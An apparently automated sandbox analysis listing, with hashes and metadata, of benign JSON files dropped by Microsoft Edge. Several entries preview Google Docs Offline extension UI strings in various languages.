                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1160
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.292894989863142
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                                                                                                                                                                                                                          MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                                                                                                                                                                                                                                                          SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                                                                                                                                                                                                                          SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                                                                                                                                                                                                                          SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):3264
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.586016059431306
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
                                                                                                                                                                                                                                                                                          MD5:83F81D30913DC4344573D7A58BD20D85
                                                                                                                                                                                                                                                                                          SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                                                                                                                                                                                                                                                                          SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
                                                                                                                                                                                                                                                                                          SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):3235
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.6081439490236464
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
                                                                                                                                                                                                                                                                                          MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                                                                                                                                                                                                                                                                          SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
                                                                                                                                                                                                                                                                                          SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
                                                                                                                                                                                                                                                                                          SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):3122
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.891443295908904
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
                                                                                                                                                                                                                                                                                          MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
                                                                                                                                                                                                                                                                                          SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
                                                                                                                                                                                                                                                                                          SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
                                                                                                                                                                                                                                                                                          SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1895
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.28990403715536
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
                                                                                                                                                                                                                                                                                          MD5:38BE0974108FC1CC30F13D8230EE5C40
                                                                                                                                                                                                                                                                                          SHA1:ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
                                                                                                                                                                                                                                                                                          SHA-256:30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
                                                                                                                                                                                                                                                                                          SHA-512:7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1042
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.3945675025513955
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
                                                                                                                                                                                                                                                                                          MD5:F3E59EEEB007144EA26306C20E04C292
                                                                                                                                                                                                                                                                                          SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
                                                                                                                                                                                                                                                                                          SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
                                                                                                                                                                                                                                                                                          SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2535
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.8479764584971368
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
                                                                                                                                                                                                                                                                                          MD5:E20D6C27840B406555E2F5091B118FC5
                                                                                                                                                                                                                                                                                          SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
                                                                                                                                                                                                                                                                                          SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
                                                                                                                                                                                                                                                                                          SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1028
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.797571191712988
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
                                                                                                                                                                                                                                                                                          MD5:970544AB4622701FFDF66DC556847652
                                                                                                                                                                                                                                                                                          SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
                                                                                                                                                                                                                                                                                          SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
                                                                                                                                                                                                                                                                                          SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):994
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.700308832360794
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
                                                                                                                                                                                                                                                                                          MD5:A568A58817375590007D1B8ABCAEBF82
                                                                                                                                                                                                                                                                                          SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
                                                                                                                                                                                                                                                                                          SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
                                                                                                                                                                                                                                                                                          SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2091
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.358252286391144
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
                                                                                                                                                                                                                                                                                          MD5:4717EFE4651F94EFF6ACB6653E868D1A
                                                                                                                                                                                                                                                                                          SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
                                                                                                                                                                                                                                                                                          SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
                                                                                                                                                                                                                                                                                          SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2778
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.595196082412897
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
                                                                                                                                                                                                                                                                                          MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
                                                                                                                                                                                                                                                                                          SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
                                                                                                                                                                                                                                                                                          SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
                                                                                                                                                                                                                                                                                          SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1719
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.287702203591075
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
                                                                                                                                                                                                                                                                                          MD5:3B98C4ED8874A160C3789FEAD5553CFA
                                                                                                                                                                                                                                                                                          SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
                                                                                                                                                                                                                                                                                          SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
                                                                                                                                                                                                                                                                                          SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):936
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.457879437756106
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
                                                                                                                                                                                                                                                                                          MD5:7D273824B1E22426C033FF5D8D7162B7
                                                                                                                                                                                                                                                                                          SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                                                                                                                                                                                                                                                                          SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                                                                                                                                                                                                                                                                          SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):3830
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.5483353063347587
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                                                                                                                                                                          MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                                                                                                                                                                          SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                                                                                                                                                                          SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                                                                                                                                                                          SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1898
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.187050294267571
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                                                                                                                                                                                                                                                                          MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                                                                                                                                                                                                                                                          SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                                                                                                                                                                                                                                                          SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                                                                                                                                                                                                                                                          SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):914
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.513485418448461
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                                                                                                                                                                                                                                                                          MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                                                                                                                                                                                                                                                          SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                                                                                                                                                                                                                                                          SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                                                                                                                                                                                                                                                                          SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):851
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                          MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                          SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                          SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                          SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):878
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.4541485835627475
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                                                                                                                                                                                                                                                                          MD5:A1744B0F53CCF889955B95108367F9C8
                                                                                                                                                                                                                                                                                          SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                                                                                                                                                                                                                                                          SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                                                                                                                                                                                                                                                          SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2766
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.839730779948262
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                                                                                                                                                                                                                                                                          MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                                                                                                                                                                                                                                                          SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                                                                                                                                                                                                                          SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                                                                                                                                                                                                                          SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):978
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.879137540019932
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                                                                                                                                                                                                                                                                          MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                                                                                                                                                                                                                                                          SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
